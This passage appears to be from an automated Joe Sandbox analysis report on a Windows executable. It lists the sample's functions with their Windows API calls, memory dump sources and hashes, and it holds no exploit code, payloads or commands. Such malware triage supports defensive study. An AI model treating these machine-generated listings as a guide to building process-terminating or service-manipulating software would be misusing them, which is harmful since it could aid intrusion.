                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\AENiBH7X1q.exe,00000004), ref: 00436055
                                                                                                                                                                                                                                                                                                                                                                                                                • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                                                                                                                                                                                                                                                                                                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00436081
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1690418490-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .lnk$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 886957087-3121654589
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 763830540-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2124370227-2873401336
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2124370227-2873401336
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1795658109-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
